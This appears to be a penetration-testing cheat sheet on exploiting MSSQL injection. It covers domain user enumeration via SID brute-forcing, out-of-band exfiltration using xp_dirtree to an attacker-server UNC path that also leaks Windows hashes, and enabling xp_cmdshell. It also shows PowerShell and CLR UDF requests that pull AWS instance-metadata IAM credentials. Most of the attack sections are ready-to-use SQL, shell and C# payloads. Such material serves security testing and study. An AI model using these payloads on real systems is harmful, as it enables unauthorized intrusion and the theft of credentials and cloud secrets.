7.8 KiB
MSSQL Injection
Active Directory enumeration
It may be possible to enumerate domain users via SQL injection inside a MSSQL server using the following MSSQL functions:
master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator'))
: If you know the name of the domain_MEGACORP_ in this example
this function will return the SID of the user Administrator in hex format. This will look like0x01050000000[...]0000f401
, note how the last 4 bytes are the number 500 in big endian format, which is the common ID of the user administrator. This function will allow you to know the ID of the domainall the bytes except of the last 4
.SUSER_SNAME(0x01050000000[...]0000e803)
: This function will return the username of the ID indicatedif any
, in this case 0000e803 in big endian == 1000usually this is the ID of the first regular user ID created
. Then you can imagine that you can bruteforce user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
def get_sid(n):
domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
user = struct.pack('<I', int(n))
user = user.hex()
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
SSRF
Information taken from https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL****
****Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the Windows Registry.
One technique that keeps coming up is the usage of the undocumented stored procedure xp_dirtree
that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests.
If you are able to execute operating system commands, then you could invoke Powershell to make a curl `Invoke-WebRequest`
request. You could do this via the hacker favorite xp_cmdshell
as well.
Alternatively, you could also use a User Defined Function in MSSQL to load a DLL and use the dll to make the request from inside MSSQL directly.
Let’s look at the above techniques in a little more detail.
Limited SSRF using master..xp_dirtree and other file stored procedures
The most common method to make a network call you will come across using MSSQL is the usage of the Stored Procedure xp_dirtree
, which weirdly is undocumented by Microsoft, which caused it to be documented by other folks on the Internet. This method has been used in multiple examples of Out of Band Data exfiltration posts on the Internet.
Essentially,
DECLARE @user varchar(100);
SELECT @user = (SELECT user);
EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
Much like MySQL’s LOAD_FILE
, you can use xp_dirtree
to make a network request to only TCP port 445. You cannot control the port number, but can read information from network shares. Addtionally, much like any UNC path access, Windows hashes will be sent over to the network that can be captured and replayed for further exploitation.
PS: This does not work on Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
running on a Windows Server 2016 Datacenter
in the default config.
There are other stored procedures like master..xp_fileexist
etc. as well that can be used for similar results.
master..xp_cmdshell
The extended stored procedure xp_cmdshell
spawns a Windows command shell and executes the string passed to it, returning any rows of text. This command is run as the SQL Server service account.
xp_cmdshell
is disabled by default. You can enable it using the SQL Server Configuration Option. Here’s how
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
GO
exec master..xp_cmdshell 'whoami'
GO
You could use something like PowerCat, download the Windows port of netcat/ncat, use raw TCP Client for arbitrary ports, or simply invoke Powershell’s Invoke-WebRequest
to make HTTP requests to perform Server Side queries.
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
exec ('master..xp_cmdshell ''powershell -exec -bypass -c ""(iwr '+@url+').Content""''');
GO
You can additionally pass other headers and change the HTTP method as well to access data on services that need a POST or PUT instead of a GET like in the case of IMDSv2 for AWS or a special header like Metadata: true
in the case of Azure or the Metadata-Flavor: Google
for GCP.
MSSQL User Defined Function - SQLHttp
It is fairly straightforward to write a CLR UDF Common Language Runtime User Defined Function - code written with any of the .NET languages and compiled into a DLL
and load it within MSSQL for custom functions. This, however, requires dbo
access so may not work unless the web application connection to the database as sa
or an Administrator role.
This Github repo has the Visual Studio project and the installation instructions to load the binary into MSSQL as a CLR assembly and then invoke HTTP GET requests from within MSSQL.
The http.cs
code uses the WebClient
class to make a GET request and fetch the content as specified
using System.Data.SqlTypes;
using System.Net;
public partial class UserDefinedFunctions
{
[Microsoft.SqlServer.Server.SqlFunction]
public static SqlString http(SqlString url)
{
var wc = new WebClient();
var html = wc.DownloadString(url.Value);
return new SqlString (html);
}
}
In the installation instructions, run the following before the CREATE ASSEMBLY
query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server you can see the list using `select * from sys.trusted_assemblies;`
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
Once the assembly is added and the function created, we can run the following to make our HTTP requests
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);